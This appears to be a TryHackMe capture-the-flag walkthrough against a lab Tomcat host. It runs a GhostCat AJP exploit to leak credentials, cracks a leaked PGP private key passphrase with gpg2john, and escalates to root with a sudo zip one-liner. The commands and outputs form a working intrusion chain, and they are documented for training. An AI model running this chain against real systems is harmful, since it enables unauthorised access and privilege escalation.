![[Pasted image 20250628204121.png]] --- # Information Gathering - Nmap Started off with scanning all TCP ports and found 4 open ports. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p- [sudo] password for parallels: Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-28 18:40 CDT Nmap scan report for 10.10.206.88 Host is up (0.13s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain 8009/tcp open ajp13 8080/tcp open http-proxy Nmap done: 1 IP address (1 host up) scanned in 23.47 seconds ``` Ran another scan against those 4 ports found. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sC -sV $IP -p 22,53,8009,8080 Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-28 18:46 CDT Nmap scan report for 10.10.206.88 Host is up (0.13s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA) | 256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA) |_ 256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (ED25519) 53/tcp open tcpwrapped 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) | ajp-methods: |_ Supported methods: GET HEAD POST OPTIONS 8080/tcp open http Apache Tomcat 9.0.30 |_http-favicon: Apache Tomcat |_http-title: Apache Tomcat/9.0.30 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.81 seconds ``` Performed a UDP port scanning against top 1,000 ports and no open port was found. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sU $IP --min-rate 3000 --top-ports 1000 Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-28 18:47 CDT Nmap scan report for 10.10.206.88 Host is up (0.13s latency). Not shown: 995 open|filtered udp ports (no-response) PORT STATE SERVICE 623/udp closed asf-rmcp 657/udp closed rmc 2002/udp closed globe 19722/udp closed unknown 27892/udp closed unknown Nmap done: 1 IP address (1 host up) scanned in 1.27 seconds ``` --- # Footprinting HTTP 8080 reveals an Apache Tomcat default page. I saw some machines allowing manager apps but this one doesn't. I couldn't find any juicy information on this port. `Gobuster` didn't reveal any interesting directories either. ![[Pasted image 20250628193413.png]] Moved to `searchsploit` and see if it has any known vulnerabilities for `ajp13` or `Apache Jserv` and it did! The first one of the result does not fit into what we are looking for. I'm going to use the Python exploit. ![[Pasted image 20250628191614.png]] We have to add a target. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ python3 48143.py usage: 48143.py [-h] [-p PORT] [-f FILE] target 48143.py: error: the following arguments are required: target ``` It returned a response from `ajp13://10.10.206.88:8009/asdf` and notice at the bottom it includes a set of credentials! ```xml ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ python2 48143.py $IP Getting resource at ajp13://10.10.206.88:8009/asdf ---------------------------- <?xml version="1.0" encoding="UTF-8"?> <!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to You under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> <web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd" version="4.0" metadata-complete="true"> <display-name>Welcome to Tomcat</display-name> <description> Welcome to GhostCat skyfuck:8730281lkjlkjdqlksalks </description> </web-app> ``` # Exploit I tried the credentials I just found on the SSH server because I couldn't find anywhere else to use them during the enumeration phase and I successfully logged in. ![[Pasted image 20250628193330.png]] Found `user.txt` flag! ```bash skyfuck@ubuntu:/home/merlin$ cat user.txt THM{Ghos... ``` --- # Privilege Escalation In `/home/skyfuck`, there are `credential.pgp` and `tryhackme.asc` files. ```bash skyfuck@ubuntu:~$ ls -la total 40 drwxr-xr-x 3 skyfuck skyfuck 4096 Jun 28 17:33 . drwxr-xr-x 4 root root 4096 Mar 10 2020 .. -rw------- 1 skyfuck skyfuck 136 Mar 10 2020 .bash_history -rw-r--r-- 1 skyfuck skyfuck 220 Mar 10 2020 .bash_logout -rw-r--r-- 1 skyfuck skyfuck 3771 Mar 10 2020 .bashrc drwx------ 2 skyfuck skyfuck 4096 Jun 28 17:33 .cache -rw-rw-r-- 1 skyfuck skyfuck 394 Mar 10 2020 credential.pgp -rw-r--r-- 1 skyfuck skyfuck 655 Mar 10 2020 .profile -rw-rw-r-- 1 skyfuck skyfuck 5144 Mar 10 2020 tryhackme.asc ``` A `.pgp` file is usually a file that has been encrypted using PGP (**Pretty Good Privacy**) encryption. PGP is used to protect the contents of a file so that only authorized people can read it. In order to decrypt a pgp file, we can use `gpg (GnuPG)` and you must need your private key but in our case, `tryhackme.asc` appears to be the private key. ```bash skyfuck@ubuntu:~$ cat tryhackme.asc | head -----BEGIN PGP PRIVATE KEY BLOCK----- Version: BCPG v1.63 lQUBBF5ocmIRDADTwu9RL5uol6+jCnuoK58+PEtPh0Zfdj4+q8z61PL56tz6YxmF 3TxA9u2jV73qFdMr5EwktTXRlEo0LTGeMzZ9R/uqe+BeBUNCZW6tqI7wDw/U1DEf StRTV1+ZmgcAjjwzr2B6qplWHhyi9PIzefiw1smqSK31MBWGamkKp/vRB5xMoOr5 ZsFq67z/5KfngjhgKWeGKLw4wXPswyIdmdnduWgpwBm4vTWlxPf1hxkDRbAa3cFD B0zktqArgROuSQ8sftGYkS/uVtyna6qbF4ywND8P6BMpLIsTKhn+r2KwLcihLtPk V0K3Dfh+6bZeIVam50QgOAXqvetuIyTt7PiCXbvOpQO3OIDgAZDLodoKdTzuaXLa cuNXmg/wcRELmhiBsKYYCTFtzdF18Pd9cM0L0mVy/nfhQKFRGx9kQkHweXVt+Pbb ``` Also `gpg` is installed in the server ```bash skyfuck@ubuntu:~$ which gpg /usr/bin/gpg ``` Before trying to decrypt the file, we need to import the private key first. ```bash skyfuck@ubuntu:~$ gpg --import tryhackme.asc gpg: key C6707170: secret key imported gpg: /home/skyfuck/.gnupg/trustdb.gpg: trustdb created gpg: key C6707170: public key "tryhackme <[email protected]>" imported gpg: key C6707170: "tryhackme <[email protected]>" not changed gpg: Total number processed: 2 gpg: imported: 1 gpg: unchanged: 1 gpg: secret keys read: 1 gpg: secret keys imported: 1 ``` After importing the private key, I tried decrypting the file but it requires passphrase :( ```bash skyfuck@ubuntu:~$ gpg --output decrypted.txt --decrypt credential.pgp You need a passphrase to unlock the secret key for user: "tryhackme <[email protected]>" 1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11 (main key ID C6707170) gpg: gpg-agent is not available in this session Enter passphrase: ``` I transferred the private key to my local kali to crack it and obtain the passphrase using `john the ripper` ![[Pasted image 20250628201449.png]] There is a tool from john the ripper called `gpg2john` and it enables us to convert the pgp private key to gpg hash which we can crack it using john ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ gpg2john tryhackme.asc > tryhackmehash File tryhackme.asc ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ cat tryhackmehash tryhackme:$gpg$*17*54*3072*713ee3f57cc950f8f89155679abe2476c62bbd286ded0e049f886d32d2b9eb06f482e9770c710abc2903f1ed70af6fcc22f5608760be*3*254*2*9*16*0c99d5dae8216f2155ba2abfcc71f818*65536*c8f277d2faf97480:::tryhackme <[email protected]>::tryhackme.asc ``` Cracked! ![[Pasted image 20250628202741.png]] Finally decrypted the `credential.pgp` file and it contained a credential. ```bash skyfuck@ubuntu:~$ gpg --output decrypted --decrypt credential.pgp You need a passphrase to unlock the secret key for user: "tryhackme <[email protected]>" 1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11 (main key ID C6707170) gpg: gpg-agent is not available in this session gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences gpg: encrypted with 1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11 "tryhackme <[email protected]>" skyfuck@ubuntu:~$ ls credential.pgp decrypted tryhackme.asc skyfuck@ubuntu:~$ cat decrypted merlin:asuy... ``` successfully logged in as merlin with the credentials found! ```bash skyfuck@ubuntu:~$ su merlin Password: merlin@ubuntu:/home/skyfuck$ whoami merlin ``` `sudo -l` reveals merlin is able to run `/usr/bin/zip` command as sudo ```bash merlin@ubuntu:~$ sudo -l Matching Defaults entries for merlin on ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User merlin may run the following commands on ubuntu: (root : root) NOPASSWD: /usr/bin/zip ``` Anytime I see an output from `sudo -l`, I immediately check out `gtfobins.github.io` to see whatever returned from `sudo -l` is listed there. Luckily, `/usr/bin/zip` is there. To summarize what the code does, it makes a fake zip file, and runs `zip` as root with a special test option which forces the system to execute a shell command as root. ![[Pasted image 20250628203831.png]] Got the shell as `root` ! ```bash merlin@ubuntu:~$ TF=$(mktemp -u) merlin@ubuntu:~$ sudo zip $TF /etc/hosts -T -TT 'sh #' adding: etc/hosts (deflated 31%) # whoami root ``` Got the `root.txt` flag :) ```bash # cd /root # cat root.txt THM{Z1P_... ```